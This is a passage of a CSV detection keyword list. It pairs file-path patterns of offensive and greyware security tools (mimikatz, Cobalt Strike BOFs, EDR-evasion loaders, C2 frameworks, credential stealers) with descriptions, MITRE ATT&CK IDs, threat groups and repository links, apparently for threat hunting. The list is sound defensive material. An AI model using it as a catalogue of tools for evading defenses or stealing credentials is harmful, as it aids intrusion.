fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.,T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,Exploitation tools,https://github.com/Flangvik/SharpCollection,1,1,N/A,N/A,10,1885,285,2023-09-23T03:34:27Z,2020-06-05T12:50:00Z -*\GzipB64.exe*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*\HackBrowserData*,offensive_tool_keyword,cobaltstrike,reflective module for HackBrowserData,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/idiotc4t/Reflective-HackBrowserData,1,0,N/A,10,10,148,21,2021-03-13T08:42:18Z,2021-03-13T08:35:01Z -*\Hades.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,0,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*\hades.exe*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,0,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*\hades-main.zip*,offensive_tool_keyword,hades,Go shellcode loader that combines multiple evasion techniques,T1055 - T1027 - T1218 - T1027.001 - T1036,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/f1zm0/hades,1,1,N/A,N/A,3,290,44,2023-06-21T19:22:57Z,2022-10-11T08:16:24Z -*\handlekatz.exe*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -*\harvest.cmb*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*\hashview.py*,offensive_tool_keyword,hashview,A web front-end for password cracking and analytics,T1110 - T1201,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/hashview/hashview,1,0,N/A,10,4,319,38,2023-09-22T21:30:50Z,2020-11-23T19:21:06Z 
-*\HiddenDesktop\*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,0,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*\hijackers\*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*\HijackHunter\*,offensive_tool_keyword,HijackHunter,Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity,T1574.002 - T1059.003 - T1078.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\hoaxshell\*.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*\HookDetector.csproj*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\HookDetector.exe*,offensive_tool_keyword,HookDetector,"Detects hooked Native API functions in the current process indicating the presence of EDR ",T1055.012 - T1082 - T1057,TA0007 - TA0003,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\HostEnum.ps1*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*\HTMLSmuggler\*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,0,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*\huan.exe *,offensive_tool_keyword,Huan,Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. 
it works on 64 bit PE files.,T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620,TA0002 - TA0008 - ,N/A,N/A,Exploitation tools,https://github.com/frkngksl/Huan,1,0,N/A,N/A,6,518,103,2021-08-13T10:48:26Z,2021-05-21T08:55:02Z -*\HWSyscalls.cpp*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\HWSyscalls-Example.*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*\hyperion.exe*,offensive_tool_keyword,hyperion,A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds),T1027.002 - T1059.001 - T1116,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://www.kali.org/tools/hyperion/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*\Hypnos.exe*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos.sln*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos.vcxproj*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - 
T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\Hypnos-main\*,offensive_tool_keyword,Hypnos,indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections,T1055.012 - T1136.001 - T1070.004 - T1055.001,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/CaptainNox/Hypnos,1,0,N/A,10,1,49,5,2023-08-22T20:17:31Z,2023-07-11T09:07:10Z -*\icebreaker.py*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*\IDiagnosticProfileUAC*,offensive_tool_keyword,IDiagnosticProfileUAC,UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl,T1548.002 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/Wh04m1001/IDiagnosticProfileUAC,1,0,N/A,10,2,173,32,2022-07-02T20:31:47Z,2022-07-02T19:55:42Z -*\iis_controller.py*,offensive_tool_keyword,IIS-Raid,A native backdoor module for Microsoft IIS,T1505.003 - T1059.001 - T1071.001,TA0002 - TA0011,N/A,N/A,C2,https://github.com/0x09AL/IIS-Raid,1,0,N/A,10,10,510,127,2020-07-03T13:31:42Z,2020-02-17T16:28:10Z -*\impacket.*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\Implant.exe *,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*\implant.exe *.exe,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,0,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*\ImplantSSP.exe*,offensive_tool_keyword,ImplantSSP,Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start,T1547.008 - T1073.001 - T1055.001,TA0003 - TA0005,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\InactiveDomainAdmins.csv*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,0,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*\inceptor.py*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*\injector.ps1 1 *,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\injector.ps1 2 *,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\Inveigh.exe*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*\inveigh.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\Inveigh\bin\*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*\IPfuscation.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\IPfuscation.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\ipscan-*-setup.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\ipscan221.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\ipscan-crash.txt*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\irs.exe*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*\Ivy\Cryptor*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of 
arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*\Ivy\Loader\*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*\JuicyPotatoNG*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*\JunctionFolder.csproj*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\katz.ps1*,offensive_tool_keyword,mimikatz,mimikatz powershell alternative name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\kdstab.exe*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*\KeeTheft.exe*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,0,private github repo,10,,N/A,,, -*\kerberoast.c*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*\KernelTokens.sys*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*\keygen.exe*,greyware_tool_keyword,_,generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares,T1204 - T1027 - T1059 - T1055 - T1060 - T1195,TA0005 - TA0002 - TA0011,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Keylogger.txt*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,0,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*\KillDefender.c*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*\KillDefender.o*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense 
Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*\kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\Koh.exe*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 
APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\Koh.pdb*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 